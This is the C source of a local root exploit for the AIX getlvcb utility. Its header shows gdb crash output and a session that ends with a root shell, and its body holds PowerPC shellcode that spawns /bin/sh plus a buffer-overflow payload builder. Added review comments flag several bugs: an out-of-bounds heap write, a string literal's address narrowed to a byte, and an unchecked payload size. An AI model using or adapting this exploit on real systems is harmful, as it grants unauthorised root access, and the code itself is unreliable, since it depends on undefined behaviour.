/******************************************************************** * Secure Network Operations (http://www.secnetops.com) * Local AIX getlvcb Exploit * by: mattox@secnetops.com * Program Description: * * Vulnerability Details: * * # gdb -q /usr/sbin/getlvcb * (no debugging symbols found)...(gdb) set args `perl -e 'print "A" x 183'`ABCD * (gdb) r * Starting program: /usr/sbin/getlvcb `perl -e 'print "A" x 183'`ABCD * * Program received signal SIGSEGV, Segmentation fault. * 0x41424344 in ?? () * (gdb) bt * #0 0x41424344 in ?? () * (gdb) i r * r0 0x6000328e 1610625678 * r1 0x2ff228a0 804399264 * r2 0xf012de88 -267198840 * r3 0x1 1 * r4 0x9 9 * r5 0x2ff22ff8 804401144 * r6 0xd030 53296 * r7 0x0 0 * r8 0x60000000 1610612736 * r9 0x600039ce 1610627534 * r10 0x0 0 * r11 0x6000214a 1610621258 * r12 0x41424344 1094861636 * r13 0x200008b0 536873136 * r14 0x0 0 * r15 0x0 0 * r16 0x0 0 * r17 0x0 0 * r18 0x0 0 * r19 0x0 0 * r20 0x0 0 * r21 0x0 0 * r22 0x0 0 * r23 0x0 0 * r24 0x0 0 * r25 0x0 0 * r26 0x0 0 * r27 0x0 0 * r28 0x41414141 1094795585 * r29 0x41414141 1094795585 * r30 0x41414141 1094795585 * r31 0x41414141 1094795585 * pc 0x41424344 1094861636 * ps 0x4000d030 1073795120 * cr 0x26222444 639771716 * lr 0x41424344 1094861636 * ctr 0x0 0 * xer 0x0 0 * fpscr 0x0 0 * vscr 0x0 0 * vrsave 0x0 0 * * ............................................................. * $ uname -a * AIX thunderfoot 1 5 002064864C00 * * $ whoami * kinet1k * * $ id * uid=7(kinet1k) gid=1(staff) groups=0(system) * $ ./r00tme 208 231 * * Secure Network Operations (written by: mattox@secnetops.com) * AIX Local getlvncb exploit * * Fixin to overwrite the address: 0x2ff2283d * Using a buffer size of: 208 * And an offset of: 231 * * # whoami * root * * # id * uid=0(root) gid=1(staff) groups=0(system) *.............................................................. 
* *********************************************************************/
/* The two header names appear to have been stripped during extraction
   (angle-bracket text lost); the directives are left exactly as found. */
#include
#include

#define OFFSET 0                         /* default offset subtracted from RETURNADDR */
#define BUFFERSIZE 208                   /* default argument length handed to getlvcb */
#define NOP "\x7c\xa5\x2a\x79"           /* a 4-byte string literal, not an integer (see use below) */
#define RETURNADDR 0x2ff22924            /* base value written into the buffer */

/* Payload as published: presumably machine code, followed by the string
   "/bin/sh".  Its contents are not interpreted anywhere in this file. */
char shellcode[ ] =
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\xb6\x05\xff\xff\x7e\x94\xa2\x79"
"\x7e\x84\xa3\x78\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\xb7\x05\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";

/*
 * Entry point.  argv[1] optionally overrides the buffer size and argv[2]
 * the offset subtracted from RETURNADDR; "-h"/"-H" as argv[1] prints usage.
 * Allocates a heap buffer, fills it as described inline, and passes it as
 * the single argument to /usr/sbin/getlvcb via execl().  The trailing
 * free()/return 0 are reached only if execl() fails; that failure is not
 * reported.
 */
int main( int argc, char *argv[ ] ) {
    int i;
    int offset = OFFSET, bufferSize = BUFFERSIZE;
    /* esp is declared but never used. */
    unsigned long esp, returnAddress, *addressPointer;
    char *buffer, *pointer;

    /* Usage.  The usage string's argument placeholders look truncated
       (probably angle-bracket text lost in extraction). */
    if( argv[ 1 ] ) {
        if( strncmp( argv[ 1 ], "-h", 3 ) == 0 || strncmp( argv[ 1 ], "-H", 3 ) == 0 ) {
            printf( "\n\tUsage: %s \n\n", argv[ 0 ] );
            exit( 0 );
        }
    }

    /* atoi() gives no error indication: non-numeric, zero or negative
       values pass through unchecked into the size arithmetic below
       (a negative bufferSize reaches malloc() converted to size_t). */
    if( argc > 1 ) {
        bufferSize = atoi( argv[ 1 ] );
    }
    if( argc > 2 ) {
        offset = atoi( argv[ 2 ] );
    }

    returnAddress = RETURNADDR - offset;

    printf( "\nSecure Network Operations (written by: mattox@secnetops.com)\n" );
    printf( "AIX Local getlvncb exploit\n\n" );
    /* "%x" expects unsigned int but receives an unsigned long (should be "%lx"). */
    printf( "Fixin to overwrite the address: 0x%x\n", returnAddress );
    printf( "Using a buffer size of: %i\n", bufferSize );
    printf( "And an offset of: %i\n", offset );

    if( !( buffer = malloc( bufferSize ) ) ) {
        printf( "Coundn't allocate memory.\n" );
        exit( 0 );
    }

    /* I know, this is weird stuff...had to sub odd number to get ret addy to align */
    /* NOTE(review): pointer starts one byte BEFORE the allocation, so the
       loop below begins with an out-of-bounds (and misaligned) heap write:
       undefined behavior in C, observed to work only by accident of the
       platform's allocator and memory layout.  The loop also assumes
       sizeof(long) == 4; with an 8-byte long it writes past the buffer. */
    pointer = buffer - 1;
    addressPointer = ( long * )pointer;
    for( i = 0; i < bufferSize; i+=4 ) {
        *( addressPointer++ ) = returnAddress;
    }

    /* NOTE(review): NOP is a string literal, so this casts its ADDRESS to
       unsigned long and then narrows it to char — it stores the low byte
       of a pointer value, not the bytes of the literal. */
    for( i = 0; i < ( bufferSize / 2 ); i+=4 ) {
        buffer[ i ] = ( unsigned long )NOP;
    }

    /* Centers the payload string in the buffer.  Nothing checks that
       bufferSize >= strlen( shellcode ); if it is smaller, the copy runs
       past the allocation. */
    pointer = buffer + ( ( bufferSize / 2 ) - ( strlen( shellcode )/2 ) );
    for( i = 0; i < strlen( shellcode ); i++ ) {
        *( pointer++ ) = shellcode[ i ];
    }

    buffer[ bufferSize - 1 ] = '\0';

    /* The argument list terminator must be a null pointer ((char *)0 or
       NULL); a bare int 0 through varargs is not guaranteed to be read
       back as a pointer. */
    execl( "/usr/sbin/getlvcb", "getlvcb", buffer, 0 );

    free( buffer );
    return 0;
}